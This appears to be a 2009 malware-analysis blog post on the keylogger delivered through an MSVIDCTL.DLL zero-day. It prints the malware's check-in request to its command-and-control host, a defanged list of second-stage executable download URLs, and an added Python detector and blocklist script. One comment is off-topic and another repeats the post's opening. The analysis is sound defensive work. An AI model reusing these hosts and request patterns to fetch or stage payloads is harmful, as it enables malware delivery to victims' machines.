
Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?

As most readers will already know, a new 0-day vulnerability in the MS Video ActiveX Control (MSVIDCTL.DLL) is currently being exploited in the wild. Plenty of research material has already been published covering the vulnerability itself and the attack vector, and I have nothing more to add on that front. I would rather focus on the malware that is dropped behind the scenes.

Readers who are interested in learning more about the vulnerability might refer to these articles:

http://voices.washingtonpost.com/securityfix/2009/07/microsoft_internet_explorer_ex.html
http://isc.sans.org/diary.html?storyid=6733
http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799

Surprisingly, no detailed analysis of the underlying malware is yet available on the web (at least I was not able to find one). The primary purpose of this article is to bridge that gap.

Let's start with the sample itself.

MD5 = 6cf94b87cbeabfa0cec421f3e4827823

Packer = NsPack

AV coverage (VirusTotal) = 95.12 %

Although the vulnerability is a 0-day, the malware it delivers has been around for quite some time. Upon execution the sample tries to contact its C&C server 'babi2009.com'. Here is what the first HTTP request looks like:

GET /360/aa1dfh.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: babi2009.com
Connection: Keep-Alive

The response to this GET request is a plain-text list of additional binaries for the sample to download and run:

1:hxxp://haha888l.com/xiao/aa1.exe
1:hxxp://haha888l.com/xiao/aa2.exe
1:hxxp://haha888l.com/xiao/aa3.exe
1:hxxp://haha888l.com/xiao/aa4.exe
1:hxxp://haha888l.com/xiao/aa5.exe
1:hxxp://haha888l.com/xiao/aa6.exe
1:hxxp://haha888l.com/xiao/aa7.exe
1:hxxp://haha888l.com/xiao/aa8.exe
1:hxxp://haha888l.com/xiao/aa9.exe
1:hxxp://haha888l.com/xiao/aa10.exe
1:hxxp://haha999b.com/xiao/aa11.exe
1:hxxp://haha999b.com/xiao/aa12.exe
1:hxxp://haha999b.com/xiao/aa13.exe
1:hxxp://haha999b.com/xiao/aa14.exe
1:hxxp://haha999b.com/xiao/aa15.exe
1:hxxp://haha999b.com/xiao/aa16.exe
1:hxxp://haha999b.com/xiao/aa17.exe
1:hxxp://haha999b.com/xiao/aa18.exe
1:hxxp://haha999b.com/xiao/aa19.exe
1:hxxp://haha999b.com/xiao/aa20.exe
1:hxxp://haha999b.com/xiao/aa21.exe
1:hxxp://haha999b.com/xiao/aa22.exe
1:hxxp://haha999b.com/xiao/aa23.exe
1:hxxp://haha999b.com/xiao/aa24.exe
1:hxxp://haha999b.com/xiao/aa25.exe
1:hxxp://haha999b.com/xiao/aa26.exe
1:hxxp://haha999b.com/xiao/aa27.exe
1:hxxp://haha999b.com/xiao/aa28.exe
1:hxxp://haha999b.com/xiao/aa29.exe
1:hxxp://haha999b.com/xiao/aa30.exe
1:hxxp://haha999b.com/xiao/aa31.exe
1:hxxp://haha999b.com/xiao/aa32.exe
1:hxxp://haha999b.com/xiao/aa33.exe
1:hxxp://haha999b.com/xiao/aa34.exe
1:hxxp://haha999b.com/xiao/aa35.exe
1:hxxp://haha999b.com/xiao/aa36.exe
1:hxxp://haha999b.com/xiao/1.exe

Most of the entries in the list are binaries named aa*.exe. Although each of these has a different MD5, underneath they are all the same piece of code: a keylogger.
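To turn the indicators above into something usable, the script below (an added example, not code from the original FireEye post) parses the downloader's "tag:URL" list format, extracts the payload hosts for a blocklist, and runs a simple detector over proxy log lines looking for the babi2009.com check-in and for .exe fetches from the payload hosts. The list and log lines in the script are constructed from the indicators quoted in the post (defanged as hxxp://, as the post shows them); the proxy log format is an assumption made for illustration, and the numeric "1:" prefix is treated as an opaque field because the post does not explain it.

```python
"""Triage helpers for the babi2009.com downloader traffic shown above.

Added example, not part of the original FireEye post.  Sample data is
constructed from the indicators in the post; the proxy log layout is assumed.
"""
import re
from urllib.parse import urlsplit

# Indicators quoted in the post: C&C host and check-in URI.  The User-Agent
# is the stock IE6/XP SP2 string, so it is parsed but NOT used as a
# discriminator; it would match a great deal of legitimate traffic.
CNC_HOST = "babi2009.com"
CNC_PATH = "/360/aa1dfh.txt"

# Constructed sample: a defanged excerpt of the list the C&C returned,
# including a stray blank line such as the one in the post.
SAMPLE_LIST = """1:hxxp://haha888l.com/xiao/aa1.exe
1:hxxp://haha888l.com/xiao/aa2.exe

1:hxxp://haha999b.com/xiao/aa11.exe
1:hxxp://haha999b.com/xiao/1.exe
"""

# "<digits>:<url>" where the URL may be written http:// or defanged hxxp://
LINE_RE = re.compile(r"^(?P<tag>\d+):(?P<url>h[tx]{2}ps?://\S+)$")


def refang(url):
    """Turn a defanged hxxp:// URL back into a parsable http:// one."""
    return re.sub(r"^hxxp", "http", url, count=1)


def parse_payload_list(text):
    """Parse the 'tag:URL' list into (tag, host, path) tuples.

    Blank and malformed lines are skipped rather than raising: the list is
    attacker controlled and a parser that crashes on junk is useless.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(refang(m.group("url")))
        if not parts.hostname:
            continue
        entries.append((m.group("tag"), parts.hostname.lower(), parts.path))
    return entries


def payload_hosts(entries):
    """Distinct hosts serving second-stage binaries, for a blocklist."""
    return sorted({host for _, host, _ in entries})


# Assumed (constructed) proxy log layout: client host method path "user-agent"
PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def flag_proxy_lines(log_lines, payload_host_set):
    """Return (client, kind, host+path) for check-ins and payload fetches."""
    hits = []
    for line in log_lines:
        m = PROXY_RE.match(line)
        if not m:
            continue
        client, host, _method, path, _ua = m.groups()
        host = host.lower()
        if host == CNC_HOST and path == CNC_PATH:
            hits.append((client, "checkin", host + path))
        elif host in payload_host_set and path.lower().endswith(".exe"):
            hits.append((client, "payload", host + path))
    return hits


SAMPLE_PROXY_LOG = [  # constructed lines, not from the post
    '10.0.0.5 babi2009.com GET /360/aa1dfh.txt "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '10.0.0.5 haha888l.com GET /xiao/aa1.exe "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '10.0.0.7 www.example.com GET /index.html "Mozilla/5.0"',
    '10.0.0.9 haha999b.com GET /xiao/1.exe "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
]


def triage():
    """Run the whole pipeline on the constructed samples."""
    entries = parse_payload_list(SAMPLE_LIST)
    hosts = payload_hosts(entries)
    return entries, hosts, flag_proxy_lines(SAMPLE_PROXY_LOG, set(hosts))


if __name__ == "__main__":
    entries, hosts, hits = triage()
    print(f"{len(entries)} payload URLs on {len(hosts)} hosts: {hosts}")
    for client, kind, target in hits:
        print(f"{client} {kind} {target}")
```

In a real deployment the host list would be refreshed from the captured list each time the C&C rotates it, and the check-in URI rather than the hostname is the stable hook: the domains here were clearly meant to be disposable.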

A Threat Expert analysis for this key logger can be found here.

The only binary that differs from the rest is the last one, 1.exe (MD5 B6941043CA9FA2E589C4B4BCE275C6D0). The outbound communication of this child download looks like this:

[screenshot of the outbound traffic from 1.exe; image not reproduced in this copy]

The malware described above is certainly just one of the payloads currently being delivered through this vulnerability. In the coming days we will see more malware paired with this exploit, and things will keep getting worse until Microsoft ships a patch. We have already seen a large spike in infections by this malware through our Malware Analysis & Exchange (MAX) Network since the exploit was made public.

There are many details I am leaving out for today; I hope to publish more in the next few days.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM

2 thoughts on "Who is Exploiting the Windows 0-day (MSVIDCTL.DLL) ?"

  1. The typical problems are unsupported hardware drivers and software that needs admin-level access to run. Both of these are security measures added to Vista and things that the *nix community has faulted Microsoft for a lot in the past.

  2. As most readers will already know, a new 0-day vulnerability in MS Video ActiveX Control is currently being exploited in the wild. Lots of research material has already been published covering different aspects of this vulnerability and the attack vector. I have nothing more to add on this front. I would rather focus on explaining the details of the malware behind the scenes.
